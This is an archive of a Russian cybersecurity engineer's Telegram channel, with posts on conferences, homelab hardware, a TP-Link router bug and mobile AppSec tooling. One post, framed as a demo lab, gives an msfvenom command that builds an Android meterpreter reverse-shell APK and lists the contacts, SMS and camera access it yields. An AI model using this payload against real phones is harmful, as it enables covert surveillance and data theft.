Дневник Комбеза
رفتن به کانال در Telegram
История одного Кибер Безопасника из маленького города в Сибири
نمایش بیشترکشور مشخص نشده استدسته بندی مشخص نشده است
780
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+47 روز
+3430 روز
آرشیو پست ها
KazHackStan
Вот и съездил я на KazHackStan — наверное, пора рассказать, как оно.
Если честно, у самой конференции есть проблемы. И у меня ощущение, что часть из них связана с тем, как отбирали спикеров. Хотя несколько докладов всё-таки были действительно годными.
Больше всего запомнились ребята, которые решили продавать AppSec как простой способ разработчику перекатиться в безопасность и заодно апнуть зарплату 😂
А вот всё остальное было очень хорошо: нормальная площадка, прикольные люди, ребята сидят над CTF, страдают — всё как положено.
Если бы сейчас выбирал, на какую из крупных конференций ехать, мой личный рейтинг был бы примерно такой:
1. ZeroNights
2. BI.ZONE
3. KazHackStan
4. PHDays
Отдельным впечатлением стала Астана. Офигенный город, очень понравилась урбанистика. Вообще не ожидал, что настолько зайдёт.
Надеюсь, в следующий раз заскочить на AppSec Fest и заодно посмотреть Алматы.
Безопасность для самых маленьких прочитана
Очень крутое выступление не смотря на очень быструю и спонтанную подготовочку.
Спасибо всем кто пришёл - был рад повидаться :)
А кто не пришёл не увидел как я его проекты рекламировал 😮
Удалось даже про PT Maze пару слов сказать (ох зря тот новогодний видос не показал)
Когда малярный скотч — часть диагностики ПК
Кто-нибудь когда-нибудь думал, что ПК можно починить, перемотав корзину с дисками малярным скотчем?
Нет? Тогда эта история вам понравится :)
Я давно искал себе ПК в дополнение к своему N100. Но отдавать почти 100к за машину, которая большую часть времени будет сервером для моих пет-проектов, мне вообще не хотелось.
И тут мне попался довольно интересный вариант — Lenovo Legion C730.
Сам по себе комп прикольный, но со своими нюансами: проприетарный БП, проприетарная плата и платформа на LGA1151 v2. Хотя последнее сейчас для меня скорее плюс.
В общем, купил я этого красавца. Сразу в сервисе, где его брал, доплатил за апгрейд до 32 ГБ ОЗУ, привёз домой, установил Proxmox — и буквально через пару часов начались приколы.
Комп перестал нормально включаться.
Запускается — и почти сразу выключается.
Ехать обратно и сдавать его было лень, поэтому начался ресёрч.
Разобрал ПК, проверил компоненты, собрал обратно — заработал.
Но потом обнаружилась интересная закономерность: любое движение корзины с дисками превращало запуск компьютера в полный хаос.
Я уже подумал, что корзина где-то коротит на корпус. Поэтому сделал то, что сделал бы любой уважающий себя инженер:
заизолировал её малярным скотчем.
И оно заработало.
Комп спокойно прожил так сутки в режиме 24/7, прошёл тесты, пережил установку моего боевого конфига Proxmox.
Я уже обрадовался. Думал: ну всё, проблема решена.
Разумеется, нет.
На момент покупки у меня не было свободного M.2 SSD. На следующий день приехал диск, я снова разобрал корпус, установил SSD…
И компьютер опять перестал запускаться.
Начались полноценные танцы с бубном.
И тут я решил вспомнить своё сисадминское прошлое и уже внимательно посмотреть, что вообще находится внутри этого Legion.
И вот тут я сильно удивился.
Во-первых, внутри стоял обычный блок питания, а не родной проприетарный.
Во-вторых, материнская плата оказалась не на Z-чипсете, что окончательно убивало мою идею поставить туда CC150 — собственно, ради этого эксперимента машина во многом и покупалась.
А самое смешное — фирменный разъём Lenovo кто-то перепаял под обычный формат.
Причём сделал это настолько аккуратно, что при первом осмотре у меня вообще не возникло подозрений.
На этом моменте я уже окончательно решил, что ПК поедет обратно. Лезть дальше в эту Франкенштейн-сборку желания не было.
Но раз уж начал — хотелось понять, почему он всё-таки не работает.
И причина оказалась максимально прекрасной.
Планки памяти, которые мне добавили при покупке, были на 3200 МГц, и конкретно в этой конфигурации компьютер с ними то запускался, то нет.
Блок питания живой.
Материнка живая.
Память живая.
Процессор живой.
Всё по отдельности работает. Вместе — вся эта конструкция стабильно работать не хочет.
Ставишь другие планки — всё прекрасно.
Но после всех сюрпризов, перепаянных разъёмов, непонятной платы и ремонта корзины малярным скотчем я решил больше судьбу не испытывать.
В итоге вернул эту поделку обратно и пришёл к простой мысли:
наверное, всё-таки лучше собрать обычный ПК из нормальных стандартных компонентов, чем пытаться строить домашний сервер из чужого инженерного творчества.
Вот такой вот Legion C730, собачка 😂
Анонс встречи Tomsk Mobile Community
▼ Что будет:
Безопасность мобильных приложений для самых маленьких
— Зачем нужна безопасность и кто ей занимается?
— Статический и динамический анализ
— Уязвимости в коде
— Как проверить безопасность приложения?
— Workshop: уязвимости, инструменты и атаки на приложение с помощью динамической инструментации.
▼ Спикеры:
— Симон Франциско, Android Developer, KTS
— Даниил Синицын, Mobile AppSec Lead
▼ Когда: 27.09.26 (воскресенье) в 18:00
▼ Где: Офис Т-Банк, ул Советская, д.78, этаж 4
В конце программы будет нетворкинг, чтобы обменяться опытом, пообщаться с коллегами из индустрии и просто приятно провести время с комьюнити.
Присоединиться к сообществу в Томске можно в группе сообщества
Mobile Broadcast | Томск
#анонс #Томск
Домашняя почта
Полезная статья про то как дома поднять свой личный почтовый сервер и для функции антиспама использовать локальные ИИ модели
https://blog.haschek.at/2026/you-should-selfhost-your-mail.html
Мне очень понравилось и вам советую к прочтению
Самохостинг
Почему я считаю self-hosting и подобного рода развлечения одними из самых полезных вещей, которые вы вообще можете придумать.
Во-первых, вы так или иначе поддерживаете и развиваете open source.
Пользуетесь Proxmox, Docker, OpenWrt или другим open-source тулингом — находите баги, репортите их, предлагаете новые фичи, иногда сами что-то допиливаете. Даже просто активное использование таких проектов уже помогает системам жить и развиваться.
Во-вторых, в какой-то момент начинаешь понимать, что за огромное количество сервисов совсем не обязательно постоянно платить.
У меня домашний сервер уже частично заменяет:
— VPS;
— облачное хранилище;
— агентскую инфраструктуру;
— небольшое количество сборщиков;
— всякую мелкую автоматизацию.
В-третьих, у вас появляется настоящая тестовая среда.
Хотите поднять старую Windows и потыкать в ней уязвимости — в добрый путь. Хотите собрать какой-нибудь странный стенд из нескольких виртуалок, прокси, VPN и тестового приложения — пожалуйста. Хотите сломать что-нибудь так, чтобы потом несколько часов разбираться, почему оно вообще работало до этого, — тоже отличный сценарий.Где-то год назад я купил себе мини-ПК на Intel N100 с 16 ГБ RAM и SSD на 512 ГБ. И оказалось, что это одна из самых полезных железок, которые я покупал за последнее время. Я, и не только я, пользуюсь этим ПК практически каждый день. Более того, эта штука довольно часто становится очень полезным помощником непосредственно в работе: быстро поднять стенд, проверить гипотезу, собрать что-нибудь для тестов. Но спустя год N100 и 16 ГБ памяти мне уже становится маловато. Поэтому сейчас думаю над апгрейдом домашнего сервера. Один из вариантов — что-то вроде AOOSTAR WTR PRO с Ryzen 7 5825U, возможностью поставить побольше RAM и несколькими отсеками под диски. Второй вариант — заказать ещё пару миников и постепенно собрать небольшой кластер. Пока думаю🤔 Если у вас дома живёт похожая инфраструктура или есть интересные варианты железа для homelab — буду рад рекомендациям.
#рекомендуююзать
Я тут начал использовать новую и на мой взгляд самую удобную тулзу для передачи любых файлов между устройствами.
https://github.com/localsend/localsend
Я использую версию cli и приложения для android/ios работает очень даже хорошо - как по мне сильно удобнее передавать ipa или всякие тестовые файлы
Mobile Security Ninja 2.0
Итак, почему я молчу в последнее время?
Все дело в том, что мы готовили и проводили очередной поток нашего курса по безопасности мобильных приложений.
Из радостного: в этот раз мы гораздо внимательнее подошли к материалам и практическим заданиям. За все время курса у нас не случилось ни одного технического факапа, хотя в прошлом году они были. Еще мы заметно лучше подготовили докладчиков и заранее протестировали инфраструктуру.
В общем, получилось круто. Спасибо всем, кто принимал участие! ❤️
А мы идем дальше: улучшать и развивать другие направления нашей работы 😎
Repost from Локалхост (Никита Куликов)
Ладно, React Native не худшее что может быть в мобильной разработке
Мобильные приложения на PHP
https://nativephp.com/
https://developer.vonage.com/en/blog/weird-science-building-android-apps-with-nativephp
+1
Интересный подход к разработке фич у TP-Link
Последнее время мало пишу в канал — рутина немного затянула. Но, чтобы скрасить ожидание, расскажу про мою последнюю неприятную находку в роутерах TP-Link.
История примерно такая: мне тут в руки на тест попал TP-Link Archer BE550, и он наотрез отказывается стабильно работать в режиме, который TP-Link называет «Точка доступа» (Access Point).
Около трёх недель я наблюдал за странностями в сети, и вчера наконец удалось докопаться до одной из причин.
Оказалось, что в режиме точки доступа TP-Link не отключает DHCP-сервер. Более того, почему-то переводит его в режим Auto(хз что этот режим должен делать, но явно не то что он делает сейчас), в котором роутер периодически умудряется выдавать IP-адреса, уже выданные основным роутером.
Результат — вполне себе серьёзные конфликты IP-адресов внутри сети и периодически отваливающиеся устройства.
И вот тут у меня возникает вопрос: как вообще такую жесть удалось пропустить в прод? Особенно учитывая, что у роутера буквально два основных режима работы. Два, Карл.
Короче, в очередной раз убеждаюсь: если хочется нормальный роутер, лучше либо брать что-то с OpenWrt, либо смотреть в сторону MikroTik и других решений от людей, которые хотя бы примерно понимают, что делают 😄
Желаю вам более стабильной сети чем у ребят с tp-link😂
+1
Нашей команде удалось побывать на Летней Школе CTF😄
Приключение оказалось достаточно увлекательным и захватывающим: на первой смене мы прошлись по базовым уязвимостям в веб приложениях , а на второй устроили целый мобильный заплыв на почти 3 часа (лекция , практика и CTF).
Спасибо всем кто принимал участие в наших активностях - вы безумно крутые 😎
Отдельное спасибо организаторам - вы делаете лучшие CTF ивенты с огромным удовольствием приедем ещё раз❤️
Semgrep Rules
Последнее время мы с командой всё чаще задумывались о том, что mobsfscan в части своего Semgrep-компонента, мягко говоря, местами глючный и довольно ограниченый.
А если попробовать найти достаточно полный набор Semgrep-правил для мобильных приложений, быстро выясняется, что хорошие правила разбросаны по всему необъятному интернету🔞
Поэтому мы решили собрать всё это в одном месте и создали репозиторий:
https://github.com/Sib-Coder/semgrep-mobile-rules
В нём постарались собрать максимально полный набор проверок для мобильных приложений и при этом избавиться от дубликатов.
Будем очень рады вашей поддержке, новым правилам и идеям для развития репозитория.
Давайте делать мобилки безопаснее вместе 😎
+2
Пост для тех кто не боится
Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?»
Сегодня практическая работа именно для таких людей.
Вам понадобится:
- телефон;
- Metasploit;
- сеть с нормальной маршрутизацией;
- навыки реверса APK — уровня детского сада достаточно.
Первое, что вам нужно, — сделать APK со зловредным функционалом. Берём Metasploit и вперёд:
bash
msfvenom -p android/meterpreter/reverse_tcp lhost=<сюда пишете IP своего ноута> lport=8888 > $PWD/Downloads/msf.apk
Дальше берёте APK, который у вас получился, и делаете так, чтобы команда adb install сработала: в паре мест патчите полученный APK и подписываете его.
Не привожу полный гайд, чтобы кто попало не начал устраивать слежку за своими одноклассницами. Они и без моей помощи найдут способы для буллинга.
Дальше — msfconsole, запускаем приложение на телефоне.
В результате мы можем наблюдать, что даже при условии, что приложение собрано не под самую новую ОС Android, нам есть что взять с телефона:
- список контактов;
- SMS — даже отправить можно: я так кинул денег другу за шаурму;
- скриншоты;
- доступ к камере;
- ...
Как итог: на мой взгляд, получилась весьма показательная лаба для тех, кто говорит, что из МП ничего сделать нельзя.
Советую повторить данное упражнение со своими коллегами. Ну или хотя бы покажите им этот пост :)+1
Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂
Repost from Кибер ПТУ | Кибербезопасность
Нигде не безопасно.
Из всех "чайников" мы уже знаем, что существует OWASP top 10 для веб-приложений, но многие ли из вас задумывались, есть ли пересечения с мобилками? А задуматься стоит, ведь мобильное приложение - это по сути тот же веб. Собственно, статья про корреляцию уязвимостей на вебе и мобилках и уникальные проблемы, а так же разбор этих уязвимостей в коде и на схемах.
Кто дочитает до конца:
1 - преисполнится
2 - найдёт практический чек-лист
3 - список дополнительной литературы для погружения
#AppSec #Pentest
🧠 Кибер ПТУ | 👨🏫 Менторство ИБ
📂 Другие каналы
Прочитал книгу «Проект “Феникс”. Роман о том, как DevOps меняет бизнес к лучшему»
Это очень понятная история о том, зачем вообще нужны процессы и почему без них любая команда рано или поздно начинает тонуть в хаосе.
Главная мысль, которую я вынес:
процессы — это не бюрократия ради бюрократии. Нормально построенный процесс помогает команде быстрее двигаться, меньше тушить пожары и лучше понимать, какую ценность она реально приносит бизнесу.
Книга хорошо показывает, что IT существует не само по себе. Любая задача, релиз, багфикс или изменение в инфраструктуре должны быть связаны с бизнес-целями: деньгами, скоростью, надежностью, пользовательским опытом, снижением рисков.
И отдельно мне понравилось, как через сюжет становится понятно, зачем бизнесу нужна команда безопасности.
Безопасность — это не команда, которая приходит в конце и говорит: «Нет, так нельзя».
В идеальном мире безопасность помогает строить процессы так, чтобы продукт развивался быстро, но при этом не создавал критичные риски для компании, клиентов и данных.
Очень советую к прочтению всем кому интересно понять: как моя работа влияет на бизнес...
